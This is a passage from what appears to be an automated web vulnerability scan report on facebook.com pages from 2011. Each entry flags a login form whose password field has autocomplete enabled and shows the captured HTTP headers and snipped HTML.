12.25. http://www.facebook.com/facebook previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.26. http://www.facebook.com/fayse previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/fayse

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.27. http://www.facebook.com/find-friends previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.28. http://www.facebook.com/gale.l.schenk previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/gale.l.schenk

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.29. http://www.facebook.com/help/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.30. http://www.facebook.com/izaOllie previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/izaOllie

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.31. http://www.facebook.com/jezzas previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/jezzas

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.32. http://www.facebook.com/kimberly.christ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/kimberly.christ

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.33. http://www.facebook.com/ladonna.lokey previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ladonna.lokey

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.34. http://www.facebook.com/lakendra.roberts previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/lakendra.roberts

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.35. http://www.facebook.com/login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.36. http://www.facebook.com/matthew.oliveira2 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/matthew.oliveira2

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.37. http://www.facebook.com/mmafighting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mmafighting

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.38. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.39. http://www.facebook.com/pages/Barnesville/115038011847083 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Barnesville/115038011847083

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.40. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.41. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Bernicks-Pepsi/123296084349478

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.42. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Blaine-Senior-High/106189406087059

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.43. http://www.facebook.com/pages/Editor-in-Chief/137829579583400 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Editor-in-Chief/137829579583400

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.44. http://www.facebook.com/pages/Gilco-Corporation/109823499042436 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Gilco-Corporation/109823499042436

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.45. http://www.facebook.com/pages/HMFIC/149403761740008 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/HMFIC/149403761740008

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.46. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Manchester-Connecticut/112527912096312

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.47. http://www.facebook.com/pages/Merchandiser/123981654314779 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Merchandiser/123981654314779

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.48. http://www.facebook.com/pages/New-Haven-College/130105783687523 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/New-Haven-College/130105783687523

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.49. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Northern-Illinois-University/108155335871674

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.50. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/San-Antonio-Texas/110297742331680

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.51. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.52. http://www.facebook.com/pages/Sporting-News/104068362964496 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Sporting-News/104068362964496

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.53. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.54. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.55. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.56. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.57. http://www.facebook.com/patroyo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/patroyo

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.58. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

12.59. http://www.facebook.com/people/Bucky-Jordan/100000824820783 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.60. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /plugins/facepile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

12.61. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.115
Connection: close
Date: Thu, 05 May 2011 10:56:43 GMT
Content-Length: 11326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
